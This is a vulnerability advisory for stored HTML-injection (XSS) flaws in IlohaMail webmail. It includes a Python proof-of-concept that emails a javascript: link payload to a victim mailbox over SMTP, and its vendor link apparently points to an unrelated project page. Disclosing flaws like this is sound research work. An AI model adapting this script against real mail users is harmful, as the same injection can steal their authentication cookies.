Release date:
Updated on:
Affected Systems:
Sourceforge IlohaMail 0.9-20050415
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55096
IlohaMail is a lightweight and functional webmail system that supports multiple languages.
IlohaMail 0.9-20050415 and other versions contain multiple HTML injection vulnerabilities. They allow an attacker to execute HTML and script code in the context of the affected site, which can be used to steal cookie-based authentication credentials or to control the appearance of the site.
Source: Shai rod
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Shai rod provides the following test method:
```python
#!/usr/bin/env python
import smtplib

print("################################################")
print("#          IlohaMail Stored XSS PoC            #")
print("#          Coded by: Shai rod                  #")
print("#          @maid                               #")
print("#          http://exploit.co.il                #")
print("#          For Educational Purposes Only!      #")
print("################################################\r\n")

# SETTINGS
sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server = "192.168.1.10"
smtp_port = 25
subject = "IlohaMail Webmail XSS PoC"

# SEND E-MAIL
print("[*] Sending E-mail to " + recipient + "...")
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\r\n"
       % (sender, recipient, subject))
msg += "Content-type: text/html\r\n\r\n"   # the blank line ends the headers
# The body is an HTML link whose href is a javascript: URL; the webmail
# client renders it unfiltered, which is the injection the advisory describes.
msg += '<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n'
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print("[+] E-mail sent!")
```
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourceforge
-----------
At the time of writing the vendor has not released a patch or upgrade. Users of the software should watch the vendor's homepage for a fixed version:
http://jocr.sourceforge.net/index.html